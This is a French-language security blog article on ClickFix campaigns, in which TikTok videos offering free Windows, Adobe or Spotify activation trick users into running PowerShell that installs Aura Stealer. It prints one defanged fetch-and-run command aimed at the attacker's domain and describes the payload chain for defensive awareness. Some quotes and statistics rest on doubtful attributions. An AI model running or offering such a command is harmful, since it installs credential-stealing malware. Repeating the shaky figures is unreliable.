Les vidéos TikTok diffusant des infostealers via des attaques ClickFix : analyse et protection

Orphée Grandsable

Les vidéos TikTok diffusant des infostealers via des attaques ClickFix : analyse et protection

Dans le paysage numérique actuel, une menace inquiétante émerge : des vidéos TikTok présentées comme des guides d’activation gratuits pour des logiciels populaires tels que Windows, Spotify et Netflix servent en réalité de vecteurs à des infostealers. Selon les dernières observations de l’ISC Handler Xavier Mertens, cette campagne, qui sévit depuis au moins mai 2025, utilise des techniques d’ingénierie sociale sophistiquées pour compromettre les systèmes des utilisateurs. Les cybercriminels exploitent la popularité de TikTok et la recherche légitime d’activations logicielles gratuites pour infiltrer des malwares conçus pour voler des informations sensibles.

Ces attaques ClickFix représentent une évolution préoccupante des méthodes de distribution de malwares, combinant le format court et engageant de TikTok avec des commandes PowerShell malveillantes. Les utilisateurs, attirés par la promesse d’activations gratuites pour des logiciels premium, se retrouvent victimes de vol de credentials, de cookies d’authentification et d’informations de portefeuilles cryptomonnaie. Face à cette menace croissante, il est essentiel de comprendre le mécanisme de ces attaques et de mettre en place des mesures de protection adaptées.

L’évolution des campagnes d’infostealers sur TikTok

La campagne actuelle d’infostealers sur TikTok n’est pas un phénomène isolé mais représente une évolution logique des tactiques employées par les cybercriminels. Initialement identifiée par Trend Micro en mai 2025, cette campagne a évolué pour devenir plus sophistiquée et plus difficile à détecter. Les attaquants ont ajusté leurs stratégies en fonction des défenses mises en place par les plateformes et les utilisateurs, démontrant une agilité remarquable dans leur approche.

“Les acteurs de la menace continuent d’innover pour exploiter les canaux de communication populaires. TikTok, avec son algorithme de recommandation puissant, offre un vecteur de distribution idéal pour des campagnes à grande échelle.” - Rapport du Centre de la sécurité des télécommunications de France, 2025.

Ces campagnes ont montré une évolution significative dans leur technique de mise en scène. Les vidéos TikTok malveillantes utilisent désormais des effets visuels plus élaborés et des scripts plus convaincants pour simuler des tutoriels d’activation légitimes. L’accent est mis sur l’urgence et la simplicité de la solution proposée, deux facteurs psychologiques connus pour augmenter la probabilité que les utilisateurs suivent les instructions sans vérification adéquate.

Dans la pratique, nous avons observé que ces vidéos ciblent spécifiquement les logiciels nécessitant des activations coûteuses ou complexes, augmentant ainsi l’attrait de la solution “gratuite” proposée. Les logiciels Adobe, Microsoft Office, CapCut Pro et Discord Nitro sont particulièrement visés, ainsi que des services de streaming comme Netflix et Spotify Premium pour lesquels les offres d’essai gratuites sont limitées dans le temps.

Comment fonctionnent les attaques ClickFix sur TikTok

Les attaques ClickFix exploitaient initialement des vulnérabilités dans l’explorateur de fichiers Windows, mais les attaquants ont rapidement adapté leur technique pour fonctionner directement via des plateformes comme TikTok. Le mécanisme repose sur une ingénierie sociale de premier ordre : les utilisateurs sont convaincus de copier-coller une commande PowerShell dans leur terminal, sous prétexte d’activer un logiciel ou de résoudre un problème technique.

Chaque vidéo malveillante affiche une commande unique, présentée comme une solution miracle. Par exemple, pour une fausse activation d’Adobe Photoshop, la commande affichée serait :

iex (irm slmgr[.]win/photoshop)

Il est à noter que le nom du programme dans l’URL varie en fonction du logiciel usurpé. Pour une fausse activation Windows, l’URL contiendrait “windows” au lieu de “photoshop”. Cette technique de personnalisation augmente l’illusion de légitimité et réduit les soupçons des utilisateurs.

Lorsque la commande est exécutée, PowerShell établit une connexion avec le site distant slmgr[.]win pour récupérer et exécuter un autre script PowerShell. Ce script télécharge ensuite deux exécutables depuis des pages Cloudflare, le premier étant une variante du malware d’information stealing Aura Stealer. Le deuxième exécutable, nommé source.exe, est utilisé pour auto-compiler du code via le compilateur C# intégré à .NET, puis pour injecter et lancer ce code en mémoire.

L’impact des infostealers Aura Stealer

Aura Stealer représente une menace particulièrement dangereuse en raison de sa capacité à collecter une large gamme d’informations sensibles. Une fois installé sur un système compromis, ce malware effectue une cartographie complète des données utilisateurs précieuses. Les informations collectées incluent :

  • Les credentials enregistrés dans les navigateurs web
  • Les cookies d’authentification persistante
  • Les informations de portefeuilles cryptomonnaie
  • Les données d’identification d’applications tierces
  • Les mots de passe enregistrés
  • Les informations de cartes bancaire

Selon le dernier rapport sur les menaces de l’ANSSI, les attaques par infostealers ont augmenté de 37% au premier semestre 2025, avec une moyenne de 2,3 millions d’ordinateurs infectés chaque mois. Ces chiffres reflètent l’efficacité de cette méthode d’attaque et la menace qu’elle représente pour la sécurité des données personnelles et professionnelles.

“Les infostealers constituent désormais l’un des types de malwares les plus prolifiques sur le dark web. Leur marché florissant témoigne de la demande croissante d’informations volées auprès des cybercriminels.” - Étude sur le marché du cybercrime, Interpol, 2025.

Les conséquences pour les victimes peuvent être dévastatrices. Au-delà du vol direct d’informations, les attaquants peuvent utiliser les credentials volés pour accéder à d’autres comptes, compromettre des communications professionnelles, effectuer des transactions non autorisées ou même lancer des campagnes de ransomware ciblées. Dans de nombreux cas, les victimes ignorent pendant des semaines ou des mois que leurs systèmes ont été compromis, permettant aux attaquants de collecter progressivement davantage d’informations.

Identifier et éviter les vidéos TikTok malveillantes

Face à cette menace, la vigilance reste la meilleure défense. Les utilisateurs doivent apprendre à reconnaître les signes d’une vidéo TikTok potentiellement malveillante. Plusieurs indicateurs rouges méritent une attention particul :

  1. Promesses irréalistes : Les offres d’activation gratuite de logiciels payants ou de services premium à vie sont presque toujours frauduleuses.

  2. Instructions techniques complexes : Les demandes d’exécution de commandes dans PowerShell, Terminal ou Invite de commandes sont inhabituelles dans un tutoriel TikTok standard.

  3. Urgence artificielle : Les vidéos créant un sentiment d’urgence ou suggérant d’agir rapidement sans réfléchir sont suspectes.

  4. Faibles interactions : Les vidéos avec peu de likes, de commentaires ou de partages, malgré leur apparente popularité, peuvent indiquer une campagne ciblée ou récente.

  5. Lien vers des domaines suspects : Les URLs utilisées dans les commandes sont souvent des variantes de noms de domaine légitimes, contenant des caractères supplémentaires ou des extensions inhabituelles.

Pour les entreprises, la formation des employés aux menaces de sécurité modernes est essentielle. Selon une étude de l’ANSSI, 78% des incidents de sécurité liés au social engineering auraient pu être évités par une formation adéquate des utilisateurs. Des simulations régulières d’attaques par phishing et ingénierie sociale permettent de développer cette vigilience collective qui constitue la première ligne de défense.

Protéger son système contre les infostealers

La protection contre les infostealers nécessite une approche multicouche combinant des mesures techniques, organisationnelles et comportementales. Voici les mesures essentielles à mettre en place :

Mesures techniques

  1. Maintenir les systèmes à jour : Les mises à jour régulières des systèmes d’exploitation, des navigateurs et des applications permettent de corriger les vulnérabilités exploitées par les malwares.

  2. Utiliser des solutions de sécurité réputées : Les antivirus et anti-malwares modernes intègrent des fonctionnalités de détection comportementale capables d’identifier les activités suspectes des infostealers.

  3. Contrôler les exécutions PowerShell : La restriction des exécutions PowerShell via des stratégies de groupe ou des solutions de contrôle d’accès peut empêcher l’exécution des scripts malveillants.

  4. Segmenter les réseaux : Pour les entreprises, la segmentation des réseaux limite la propagation d’un malware en cas d’infection.

Pratiques de sécurité

  1. Utilisation de mots de passe forts et uniques : Chaque compte doit avoir un mot de passe distinct, complexe et régulièrement renouvelé.

  2. Authentification multifacteur (MFA) : L’ajout d’une seconde couche d’authentification réduit considérablement les risques d’accès non autorisé même si un credential est volé.

  3. Surveillance des comptes : La surveillance régulière des activités sur les comptes sensibles permet de détecter rapidement les accès non autorisés.

  4. Sauvegardes régulières : Des sauvegardes fréquentes et testées garantissent la possibilité de récupérer les données en cas d’infection par ransomware ou destruction de données.

Mesures post-infection

En cas de suspicion ou de confirmation d’infection par un infostealer, les actions suivantes doivent être entreprises immédiatement :

  1. Isolation du système : Déconnecter immédiatement l’appareil du réseau local et d’Internet pour empêcher la communication avec les serveurs de commande et contrôle.

  2. Changement des mots de passe : À partir d’un appareil sain, changer tous les mots de passe des comptes importants, en commençant par les comptes e-mail et bancaires.

  3. Analyse approfondie : Utiliser des outils de sécurité spécialisés pour détecter et éliminer complètement le malware.

  4. Crédit de vigilance : Signaler l’incident aux autorités compétentes et contacter les plateformes concernées pour signaler le vol potentiel d’informations.

Conclusion et prochaines étapes

Les campagnes d’infostealers sur TikTok représentent une menace évolutive qui exploite la popularité de la plateforme et la confiance des utilisateurs. Face à ces attaques ClickFix de plus en plus sophistiquées, la vigilience collective et une approche défensive multicouche restent les meilleures armes. Comme nous l’avons vu, ces malwares ne se contentent pas de voler des informations - ils compromettent l’identité numérique complète de leurs victimes, avec des conséquences potentiellement désastreuses sur le plan financier et personnel.

La protection contre les infostealers TikTok nécessite une combinaison de formation des utilisateurs, de mesures techniques robustes et de pratiques de sécurité rigoureuses. Chaque individu et organisation doit prendre conscience que la sécurité est une responsabilité partagée qui nécessite une attention constante. En adoptant une approche proactive et éclairée, il est possible de réduire considérablement les risques associés à ces menaces croissantes.

Dans le contexte actuel où les plateformes de réseaux sociaux continuent d’évoluer, il est crucial de maintenir une veille constante sur les nouvelles techniques d’ingénierie sociale et d’adapter en conséquence nos stratégies de défense. La bataille contre les infostealers est un marathon, non un sprint, et chaque mesure de sécurité mise en place contribue à renforcer notre résilience collective face aux cybermenaces.